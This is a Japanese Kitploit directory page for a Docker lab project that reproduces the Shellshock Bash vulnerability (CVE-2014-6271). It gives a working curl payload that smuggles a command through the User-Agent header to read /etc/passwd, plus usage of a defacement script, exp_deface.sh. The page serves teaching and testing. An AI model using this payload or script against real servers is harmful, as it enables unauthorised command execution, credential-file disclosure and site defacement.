Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-6271 — CVE(ShellShock)のプレゼンテーションプロジェクト。PDF、技術デモ、再現可能な手順を含む。 | Kitploit
ツール/GitHubGitHub/radyio/cve-2014-6271
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubradyio/cve-2014-6271

CVE-2014-6271

CVE(ShellShock)のプレゼンテーションプロジェクト。PDF、技術デモ、再現可能な手順を含む。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2014-6271

説明

このプロジェクトは、CVE-2014-6271(別名 Shellshock)の脆弱性を再現するためのものです。ShellshockはBashのセキュリティ脆弱性であり、環境変数を介して悪意のあるコードを実行することを可能にします。

このプロジェクトの目的は、Docker環境におけるこの脆弱性の影響を実証することです。

前提条件

始める前に、Dockerがマシンにインストールされていることを確認してください。Dockerはこちらからダウンロードできます。

インストールと起動

1. Dockerイメージの構築

プロジェクトディレクトリで、以下のコマンドを実行してDockerイメージを構築します:

root@kitploit:~
docker build -t ['image name'] .

['image name'] をDockerイメージに付けたい名前に置き換えてください。

2. Dockerコンテナの起動

イメージが構築されたら、以下のコマンドでこのイメージからコンテナを起動します:

root@kitploit:~
docker run -it --rm -p 8080:80 ['image name']

これにより、サービスのローカルマシンのポート8080が公開されます。

3. アプリケーションへのアクセス

ブラウザを開き、http://localhost:8080にアクセスします。アプリケーションの動作を確認し、脆弱性をテストできます。

4-1. 脆弱性の悪用

別のターミナルで、以下のコマンドを実行して脆弱性を悪用し、/etc/passwdファイルの内容を読み取ります:

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

このコマンドは、Shellshockを悪用するために特別に設計されたuser-agentヘッダーを送信します。脆弱性が正しく再現されると、/etc/passwdの内容がターミナル出力に表示されます。

4-2. 脆弱性の悪用(exp_deface.shスクリプト)

このスクリプトは、ターゲットのWebページを改ざんするための脆弱性を悪用します。この脆弱性は、CGIスクリプトの不適切な設定に起因し、サーバー上で任意のコマンドを実行することを可能にします。

前提条件: ターゲットがShellShockバグに対して脆弱であることを確認してください。 このターゲットでエクスプロイトをテストするための必要な権限があることを確認してください。

root@kitploit:~
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

セキュリティ

重要: この脆弱性は、管理された環境でのテストおよびデモンストレーション目的でのみ使用する必要があります。本番環境ではこのプロジェクトを使用しないでください。

ツールをダウンロード